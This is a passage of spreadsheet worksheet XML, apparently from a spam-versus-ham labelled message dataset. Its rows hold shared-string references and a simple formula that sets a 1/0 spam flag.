    <row r="3843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3843" t="s">
        <v>8910</v>
      </c>
      <c r="B3843" t="s">
        <v>5294</v>
      </c>
      <c r="C3843" s="1">
        <f>IF(B3843="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3844" t="s">
        <v>8911</v>
      </c>
      <c r="B3844" t="s">
        <v>5294</v>
      </c>
      <c r="C3844" s="1">
        <f>IF(B3844="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3845" t="s">
        <v>8912</v>
      </c>
      <c r="B3845" t="s">
        <v>5294</v>
      </c>
      <c r="C3845" s="1">
        <f>IF(B3845="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3846" t="s">
        <v>8913</v>
      </c>
      <c r="B3846" t="s">
        <v>5294</v>
      </c>
      <c r="C3846" s="1">
        <f>IF(B3846="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3847" t="s">
        <v>8914</v>
      </c>
      <c r="B3847" t="s">
        <v>5294</v>
      </c>
      <c r="C3847" s="1">
        <f>IF(B3847="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3848" t="s">
        <v>7561</v>
      </c>
      <c r="B3848" t="s">
        <v>5297</v>
      </c>
      <c r="C3848" s="1">
        <f>IF(B3848="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3849" t="s">
        <v>8915</v>
      </c>
      <c r="B3849" t="s">
        <v>5294</v>
      </c>
      <c r="C3849" s="1">
        <f>IF(B3849="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3850" t="s">
        <v>8916</v>
      </c>
      <c r="B3850" t="s">
        <v>5294</v>
      </c>
      <c r="C3850" s="1">
        <f>IF(B3850="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3851" t="s">
        <v>8917</v>
      </c>
      <c r="B3851" t="s">
        <v>5294</v>
      </c>
      <c r="C3851" s="1">
        <f>IF(B3851="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3852" t="s">
        <v>8918</v>
      </c>
      <c r="B3852" t="s">
        <v>5294</v>
      </c>
      <c r="C3852" s="1">
        <f>IF(B3852="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3853" t="s">
        <v>8919</v>
      </c>
      <c r="B3853" t="s">
        <v>5294</v>
      </c>
      <c r="C3853" s="1">
        <f>IF(B3853="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3854" t="s">
        <v>8920</v>
      </c>
      <c r="B3854" t="s">
        <v>5294</v>
      </c>
      <c r="C3854" s="1">
        <f>IF(B3854="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3855" t="s">
        <v>8921</v>
      </c>
      <c r="B3855" t="s">
        <v>5294</v>
      </c>
      <c r="C3855" s="1">
        <f>IF(B3855="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3856" t="s">
        <v>8922</v>
      </c>
      <c r="B3856" t="s">
        <v>5297</v>
      </c>
      <c r="C3856" s="1">
        <f>IF(B3856="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3857" t="s">
        <v>8923</v>
      </c>
      <c r="B3857" t="s">
        <v>5294</v>
      </c>
      <c r="C3857" s="1">
        <f>IF(B3857="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3858" t="s">
        <v>8924</v>
      </c>
      <c r="B3858" t="s">
        <v>5294</v>
      </c>
      <c r="C3858" s="1">
        <f>IF(B3858="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3859" t="s">
        <v>8925</v>
      </c>
      <c r="B3859" t="s">
        <v>5294</v>
      </c>
      <c r="C3859" s="1">
        <f>IF(B3859="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3860" t="s">
        <v>8926</v>
      </c>
      <c r="B3860" t="s">
        <v>5297</v>
      </c>
      <c r="C3860" s="1">
        <f>IF(B3860="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3861" t="s">
        <v>8927</v>
      </c>
      <c r="B3861" t="s">
        <v>5294</v>
      </c>
      <c r="C3861" s="1">
        <f>IF(B3861="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3862" t="s">
        <v>8928</v>
      </c>
      <c r="B3862" t="s">
        <v>5297</v>
      </c>
      <c r="C3862" s="1">
        <f>IF(B3862="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3863" t="s">
        <v>8929</v>
      </c>
      <c r="B3863" t="s">
        <v>5294</v>
      </c>
      <c r="C3863" s="1">
        <f>IF(B3863="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3864" t="s">
        <v>8930</v>
      </c>
      <c r="B3864" t="s">
        <v>5297</v>
      </c>
      <c r="C3864" s="1">
        <f>IF(B3864="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3865" t="s">
        <v>8931</v>
      </c>
      <c r="B3865" t="s">
        <v>5294</v>
      </c>
      <c r="C3865" s="1">
        <f>IF(B3865="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3866" t="s">
        <v>8932</v>
      </c>
      <c r="B3866" t="s">
        <v>5294</v>
      </c>
      <c r="C3866" s="1">
        <f>IF(B3866="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3867" t="s">
        <v>8933</v>
      </c>
      <c r="B3867" t="s">
        <v>5294</v>
      </c>
      <c r="C3867" s="1">
        <f>IF(B3867="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3868" t="s">
        <v>8934</v>
      </c>
      <c r="B3868" t="s">
        <v>5294</v>
      </c>
      <c r="C3868" s="1">
        <f>IF(B3868="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3869" t="s">
        <v>8935</v>
      </c>
      <c r="B3869" t="s">
        <v>5294</v>
      </c>
      <c r="C3869" s="1">
        <f>IF(B3869="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3870" t="s">
        <v>8936</v>
      </c>
      <c r="B3870" t="s">
        <v>5294</v>
      </c>
      <c r="C3870" s="1">
        <f>IF(B3870="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3871" t="s">
        <v>8937</v>
      </c>
      <c r="B3871" t="s">
        <v>5294</v>
      </c>
      <c r="C3871" s="1">
        <f>IF(B3871="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3872" t="s">
        <v>8938</v>
      </c>
      <c r="B3872" t="s">
        <v>5294</v>
      </c>
      <c r="C3872" s="1">
        <f>IF(B3872="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3873" t="s">
        <v>8939</v>
      </c>
      <c r="B3873" t="s">
        <v>5294</v>
      </c>
      <c r="C3873" s="1">
        <f>IF(B3873="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3874" t="s">
        <v>8940</v>
      </c>
      <c r="B3874" t="s">
        <v>5294</v>
      </c>
      <c r="C3874" s="1">
        <f>IF(B3874="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3875" t="s">
        <v>8941</v>
      </c>
      <c r="B3875" t="s">
        <v>5294</v>
      </c>
      <c r="C3875" s="1">
        <f>IF(B3875="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3876" t="s">
        <v>8942</v>
      </c>
      <c r="B3876" t="s">
        <v>5294</v>
      </c>
      <c r="C3876" s="1">
        <f>IF(B3876="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3877" t="s">
        <v>8943</v>
      </c>
      <c r="B3877" t="s">
        <v>5294</v>
      </c>
      <c r="C3877" s="1">
        <f>IF(B3877="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3878" t="s">
        <v>8944</v>
      </c>
      <c r="B3878" t="s">
        <v>5294</v>
      </c>
      <c r="C3878" s="1">
        <f>IF(B3878="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3879" t="s">
        <v>8945</v>
      </c>
      <c r="B3879" t="s">
        <v>5294</v>
      </c>
      <c r="C3879" s="1">
        <f>IF(B3879="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3880" t="s">
        <v>8946</v>
      </c>
      <c r="B3880" t="s">
        <v>5294</v>
      </c>
      <c r="C3880" s="1">
        <f>IF(B3880="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3881" t="s">
        <v>8947</v>
      </c>
      <c r="B3881" t="s">
        <v>5294</v>
      </c>
      <c r="C3881" s="1">
        <f>IF(B3881="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3882" t="s">
        <v>8915</v>
      </c>
      <c r="B3882" t="s">
        <v>5294</v>
      </c>
      <c r="C3882" s="1">
        <f>IF(B3882="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3883" t="s">
        <v>8865</v>
      </c>
      <c r="B3883" t="s">
        <v>5294</v>
      </c>
      <c r="C3883" s="1">
        <f>IF(B3883="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3884" t="s">
        <v>8948</v>
      </c>
      <c r="B3884" t="s">
        <v>5294</v>
      </c>
      <c r="C3884" s="1">
        <f>IF(B3884="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3885" t="s">
        <v>8949</v>
      </c>
      <c r="B3885" t="s">
        <v>5297</v>
      </c>
      <c r="C3885" s="1">
        <f>IF(B3885="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3886" t="s">
        <v>8950</v>
      </c>
      <c r="B3886" t="s">
        <v>5294</v>
      </c>
      <c r="C3886" s="1">
        <f>IF(B3886="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3887" t="s">
        <v>8951</v>
      </c>
      <c r="B3887" t="s">
        <v>5294</v>
      </c>
      <c r="C3887" s="1">
        <f>IF(B3887="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3888" t="s">
        <v>8952</v>
      </c>
      <c r="B3888" t="s">
        <v>5294</v>
      </c>
      <c r="C3888" s="1">
        <f>IF(B3888="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3889" t="s">
        <v>8953</v>
      </c>
      <c r="B3889" t="s">
        <v>5294</v>
      </c>
      <c r="C3889" s="1">
        <f>IF(B3889="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3890" t="s">
        <v>8954</v>
      </c>
      <c r="B3890" t="s">
        <v>5294</v>
      </c>
      <c r="C3890" s="1">
        <f>IF(B3890="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3891" t="s">
        <v>8955</v>
      </c>
      <c r="B3891" t="s">
        <v>5297</v>
      </c>
      <c r="C3891" s="1">
        <f>IF(B3891="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3892" t="s">
        <v>8956</v>
      </c>
      <c r="B3892" t="s">
        <v>5294</v>
      </c>
      <c r="C3892" s="1">
        <f>IF(B3892="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3893" t="s">
        <v>8957</v>
      </c>
      <c r="B3893" t="s">
        <v>5297</v>
      </c>
      <c r="C3893" s="1">
        <f>IF(B3893="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3894" t="s">
        <v>8958</v>
      </c>
      <c r="B3894" t="s">
        <v>5294</v>
      </c>
      <c r="C3894" s="1">
        <f>IF(B3894="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3895" t="s">
        <v>8959</v>
      </c>
      <c r="B3895" t="s">
        <v>5297</v>
      </c>
      <c r="C3895" s="1">
        <f>IF(B3895="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3896" t="s">
        <v>8960</v>
      </c>
      <c r="B3896" t="s">
        <v>5294</v>
      </c>
      <c r="C3896" s="1">
        <f>IF(B3896="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3897" t="s">
        <v>8961</v>
      </c>
      <c r="B3897" t="s">
        <v>5297</v>
      </c>
      <c r="C3897" s="1">
        <f>IF(B3897="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3898" t="s">
        <v>8962</v>
      </c>
      <c r="B3898" t="s">
        <v>5294</v>
      </c>
      <c r="C3898" s="1">
        <f>IF(B3898="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3899" t="s">
        <v>6463</v>
      </c>
      <c r="B3899" t="s">
        <v>5294</v>
      </c>
      <c r="C3899" s="1">
        <f>IF(B3899="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3900" t="s">
        <v>8963</v>
      </c>
      <c r="B3900" t="s">
        <v>5294</v>
      </c>
      <c r="C3900" s="1">
        <f>IF(B3900="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3901" t="s">
        <v>7785</v>
      </c>
      <c r="B3901" t="s">
        <v>5294</v>
      </c>
      <c r="C3901" s="1">
        <f>IF(B3901="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3902" t="s">
        <v>8964</v>
      </c>
      <c r="B3902" t="s">
        <v>5294</v>
      </c>
      <c r="C3902" s="1">
        <f>IF(B3902="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3903" t="s">
        <v>8965</v>
      </c>
      <c r="B3903" t="s">
        <v>5294</v>
      </c>
      <c r="C3903" s="1">
        <f>IF(B3903="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3904" t="s">
        <v>8966</v>
      </c>
      <c r="B3904" t="s">
        <v>5294</v>
      </c>
      <c r="C3904" s="1">
        <f>IF(B3904="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3905" t="s">
        <v>8967</v>
      </c>
      <c r="B3905" t="s">
        <v>5297</v>
      </c>
      <c r="C3905" s="1">
        <f>IF(B3905="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3906" t="s">
        <v>8968</v>
      </c>
      <c r="B3906" t="s">
        <v>5297</v>
      </c>
      <c r="C3906" s="1">
        <f>IF(B3906="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3907" t="s">
        <v>8969</v>
      </c>
      <c r="B3907" t="s">
        <v>5294</v>
      </c>
      <c r="C3907" s="1">
        <f>IF(B3907="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3908" t="s">
        <v>8970</v>
      </c>
      <c r="B3908" t="s">
        <v>5294</v>
      </c>
      <c r="C3908" s="1">
        <f>IF(B3908="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3909" t="s">
        <v>8971</v>
      </c>
      <c r="B3909" t="s">
        <v>5294</v>
      </c>
      <c r="C3909" s="1">
        <f>IF(B3909="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3910" t="s">
        <v>8972</v>
      </c>
      <c r="B3910" t="s">
        <v>5294</v>
      </c>
      <c r="C3910" s="1">
        <f>IF(B3910="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3911" t="s">
        <v>8973</v>
      </c>
      <c r="B3911" t="s">
        <v>5294</v>
      </c>
      <c r="C3911" s="1">
        <f>IF(B3911="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3912" t="s">
        <v>8974</v>
      </c>
      <c r="B3912" t="s">
        <v>5294</v>
      </c>
      <c r="C3912" s="1">
        <f>IF(B3912="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3913" t="s">
        <v>5884</v>
      </c>
      <c r="B3913" t="s">
        <v>5297</v>
      </c>
      <c r="C3913" s="1">
        <f>IF(B3913="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3914" t="s">
        <v>8975</v>
      </c>
      <c r="B3914" t="s">
        <v>5294</v>
      </c>
      <c r="C3914" s="1">
        <f>IF(B3914="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3915" t="s">
        <v>5602</v>
      </c>
      <c r="B3915" t="s">
        <v>5294</v>
      </c>
      <c r="C3915" s="1">
        <f>IF(B3915="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3916" t="s">
        <v>8976</v>
      </c>
      <c r="B3916" t="s">
        <v>5294</v>
      </c>
      <c r="C3916" s="1">
        <f>IF(B3916="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3917" t="s">
        <v>8977</v>
      </c>
      <c r="B3917" t="s">
        <v>5294</v>
      </c>
      <c r="C3917" s="1">
        <f>IF(B3917="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3918" t="s">
        <v>8978</v>
      </c>
      <c r="B3918" t="s">
        <v>5294</v>
      </c>
      <c r="C3918" s="1">
        <f>IF(B3918="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3919" t="s">
        <v>8979</v>
      </c>
      <c r="B3919" t="s">
        <v>5294</v>
      </c>
      <c r="C3919" s="1">
        <f>IF(B3919="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3920" t="s">
        <v>8980</v>
      </c>
      <c r="B3920" t="s">
        <v>5294</v>
      </c>
      <c r="C3920" s="1">
        <f>IF(B3920="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3921" t="s">
        <v>8981</v>
      </c>
      <c r="B3921" t="s">
        <v>5297</v>
      </c>
      <c r="C3921" s="1">
        <f>IF(B3921="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3922" t="s">
        <v>6317</v>
      </c>
      <c r="B3922" t="s">
        <v>5294</v>
      </c>
      <c r="C3922" s="1">
        <f>IF(B3922="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3923" t="s">
        <v>8982</v>
      </c>
      <c r="B3923" t="s">
        <v>5294</v>
      </c>
      <c r="C3923" s="1">
        <f>IF(B3923="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3924" t="s">
        <v>8983</v>
      </c>
      <c r="B3924" t="s">
        <v>5294</v>
      </c>
      <c r="C3924" s="1">
        <f>IF(B3924="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3925" t="s">
        <v>8984</v>
      </c>
      <c r="B3925" t="s">
        <v>5294</v>
      </c>
      <c r="C3925" s="1">
        <f>IF(B3925="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3926" t="s">
        <v>8985</v>
      </c>
      <c r="B3926" t="s">
        <v>5294</v>
      </c>
      <c r="C3926" s="1">
        <f>IF(B3926="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3927" t="s">
        <v>8986</v>
      </c>
      <c r="B3927" t="s">
        <v>5294</v>
      </c>
      <c r="C3927" s="1">
        <f>IF(B3927="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3928" t="s">
        <v>8987</v>
      </c>
      <c r="B3928" t="s">
        <v>5294</v>
      </c>
      <c r="C3928" s="1">
        <f>IF(B3928="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3929" t="s">
        <v>8988</v>
      </c>
      <c r="B3929" t="s">
        <v>5294</v>
      </c>
      <c r="C3929" s="1">
        <f>IF(B3929="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3930" t="s">
        <v>8989</v>
      </c>
      <c r="B3930" t="s">
        <v>5294</v>
      </c>
      <c r="C3930" s="1">
        <f>IF(B3930="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3931" t="s">
        <v>8990</v>
      </c>
      <c r="B3931" t="s">
        <v>5294</v>
      </c>
      <c r="C3931" s="1">
        <f>IF(B3931="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3932" t="s">
        <v>8991</v>
      </c>
      <c r="B3932" t="s">
        <v>5294</v>
      </c>
      <c r="C3932" s="1">
        <f>IF(B3932="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3933" t="s">
        <v>8992</v>
      </c>
      <c r="B3933" t="s">
        <v>5294</v>
      </c>
      <c r="C3933" s="1">
        <f>IF(B3933="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3934" t="s">
        <v>8993</v>
      </c>
      <c r="B3934" t="s">
        <v>5294</v>
      </c>
      <c r="C3934" s="1">
        <f>IF(B3934="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3935" t="s">
        <v>8994</v>
      </c>
      <c r="B3935" t="s">
        <v>5294</v>
      </c>
      <c r="C3935" s="1">
        <f>IF(B3935="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3936" t="s">
        <v>8995</v>
      </c>
      <c r="B3936" t="s">
        <v>5294</v>
      </c>
      <c r="C3936" s="1">
        <f>IF(B3936="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3937" t="s">
        <v>8996</v>
      </c>
      <c r="B3937" t="s">
        <v>5294</v>
      </c>
      <c r="C3937" s="1">
        <f>IF(B3937="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3938" t="s">
        <v>8997</v>
      </c>
      <c r="B3938" t="s">
        <v>5294</v>
      </c>
      <c r="C3938" s="1">
        <f>IF(B3938="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3939" t="s">
        <v>8998</v>
      </c>
      <c r="B3939" t="s">
        <v>5294</v>
      </c>
      <c r="C3939" s="1">
        <f>IF(B3939="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3940" t="s">
        <v>8999</v>
      </c>
      <c r="B3940" t="s">
        <v>5294</v>
      </c>
      <c r="C3940" s="1">
        <f>IF(B3940="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3941" t="s">
        <v>9000</v>
      </c>
      <c r="B3941" t="s">
        <v>5294</v>
      </c>
      <c r="C3941" s="1">
        <f>IF(B3941="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3942" t="s">
        <v>9001</v>
      </c>
      <c r="B3942" t="s">
        <v>5297</v>
      </c>
      <c r="C3942" s="1">
        <f>IF(B3942="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3943" t="s">
        <v>9002</v>
      </c>
      <c r="B3943" t="s">
        <v>5294</v>
      </c>
      <c r="C3943" s="1">
        <f>IF(B3943="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3944" t="s">
        <v>7860</v>
      </c>
      <c r="B3944" t="s">
        <v>5294</v>
      </c>
      <c r="C3944" s="1">
        <f>IF(B3944="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3945" t="s">
        <v>9003</v>
      </c>
      <c r="B3945" t="s">
        <v>5294</v>
      </c>
      <c r="C3945" s="1">
        <f>IF(B3945="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3946" t="s">
        <v>9004</v>
      </c>
      <c r="B3946" t="s">
        <v>5294</v>
      </c>
      <c r="C3946" s="1">
        <f>IF(B3946="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
